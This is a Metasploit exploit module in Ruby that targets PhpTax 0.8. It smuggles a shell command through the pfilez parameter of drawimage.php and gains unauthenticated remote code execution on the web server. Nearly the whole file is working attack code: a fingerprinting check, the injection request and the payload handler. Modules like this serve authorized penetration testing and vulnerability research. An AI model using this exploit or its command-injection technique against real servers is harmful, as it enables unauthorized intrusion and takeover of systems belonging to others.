metasploit-gs/modules/exploits/multi/http/phptax_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "PhpTax pfilez Parameter Exec Remote Code Injection",
        'Description' => %q{
          This module exploits a vulnerability found in PhpTax, an income tax report
          generator.  When generating a PDF, the icondrawpng() function in drawimage.php
          does not properly handle the pfilez parameter, which will be used in an exec()
          statement, and then results in arbitrary remote code execution under the context
          of the web server.  Please note: authentication is not required to exploit this
          vulnerability.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Jean Pascal Pereira <pereira[at]secbiz.de>',
          'sinn3r' # Metasploit
        ],
        'References' => [
          ['CVE', '2012-10037'],
          ['OSVDB', '86992'],
          ['EDB', '21665']
        ],
        'Payload' => {
          'Compat' =>
                {
                  'ConnectionType' => 'find',
                  'PayloadType' => 'cmd',
                  'RequiredCmd' => 'generic perl ruby telnet python'
                }
        },
        'Platform' => %w{linux unix},
        'Targets' => [
          ['PhpTax 0.8', {}]
        ],
        'Arch' => ARCH_CMD,
        'Privileged' => false,
        'DisclosureDate' => '2012-10-08',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to the web application', '/phptax/'])
      ]
    )
  end

  def check
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1, 1] != '/'
    res = send_request_raw({ 'uri' => uri })
    if res and res.body =~ /PHPTAX by William L\. Berggren/
      return Exploit::CheckCode::Detected('The target service was detected')
    else
      return Exploit::CheckCode::Safe('The target is not vulnerable')
    end
  end

  def exploit
    uri = target_uri.path

    print_status("#{rhost}#{rport} - Sending request...")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, "drawimage.php"),
      'vars_get' => {
        'pdf' => 'make',
        'pfilez' => "xxx; #{payload.encoded}"
      }
    })

    handler
  end
end